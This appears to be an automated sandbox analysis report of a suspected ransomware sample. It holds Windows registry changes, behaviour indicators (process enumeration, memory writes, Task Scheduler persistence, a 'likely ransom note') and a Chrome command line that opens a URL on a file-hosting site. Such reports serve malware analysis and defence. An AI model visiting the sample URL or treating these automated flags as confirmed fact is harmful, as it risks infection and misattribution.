Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	notepad++.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad++.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5c003100000000007256503c10004e4f544550417e310000440009000400efbe72564d3c7256503c2e0000008b3302000000010000000000000000000000000000002f0bbc004e006f00740065007000610064002b002b00000018000000	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	notepad++.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff	notepad++.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	notepad++.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++64	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	notepad++.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = ffffffff	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad++.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\Settings	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\InprocServer32\ = "C:\\Program Files\\Notepad++\\NppShell_06.dll"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\Settings\Maxtext = "25"	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	notepad++.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	notepad++.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++64\ = "{B298D29A-A6ED-11DE-BA8C-A68E55D89593}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	notepad++.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	notepad++.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	notepad++.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\Settings\Dynamic = "1"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	notepad++.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\Settings\Custom	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	notepad++.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	notepad++.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3876	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3828	mstsc.exe
4688	mstsc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
5656	chrome.exe
5656	chrome.exe
5564	chrome.exe
5564	chrome.exe
2668	chrome.exe
2668	chrome.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
4996	powershell.exe
4996	powershell.exe
4996	powershell.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
2672	powershell.exe
2672	powershell.exe
2672	powershell.exe
2340	EchoLogger.exe
2340	EchoLogger.exe
3424	powershell.exe
3424	powershell.exe
3424	powershell.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
2656	powershell.exe
2656	powershell.exe
2656	powershell.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe
4692	EchoLogger.exe
4692	EchoLogger.exe
5288	powershell.exe
5288	powershell.exe
5288	powershell.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
2284	powershell.exe
2284	powershell.exe
2284	powershell.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
4564	powershell.exe
4564	powershell.exe
4564	powershell.exe
5312	EchoLogger.exe
5312	EchoLogger.exe
1784	powershell.exe
1784	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2548	notepad++.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
668	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe
Token: SeShutdownPrivilege	3592	chrome.exe
Token: SeCreatePagefilePrivilege	3592	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3828	mstsc.exe
3828	mstsc.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
5656	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe
2668	chrome.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
3828	mstsc.exe
4696	OpenWith.exe
1388	gup.exe
2548	notepad++.exe
2548	notepad++.exe
2548	notepad++.exe
2548	notepad++.exe
2072	SearchApp.exe
2072	SearchApp.exe
2072	SearchApp.exe
2072	SearchApp.exe
5968	SearchApp.exe
5968	SearchApp.exe
4688	mstsc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3592 wrote to memory of 2360	3592	chrome.exe	85
PID 3592 wrote to memory of 2360	3592	chrome.exe	85
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 2672	3592	chrome.exe	87
PID 3592 wrote to memory of 180	3592	chrome.exe	88
PID 3592 wrote to memory of 180	3592	chrome.exe	88
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89
PID 3592 wrote to memory of 4184	3592	chrome.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://s6.dosya.tc/server12/8c8mm7/Yeni_Metin_Belgesi.txt.html
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc2e629758,0x7ffc2e629768,0x7ffc2e629778
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
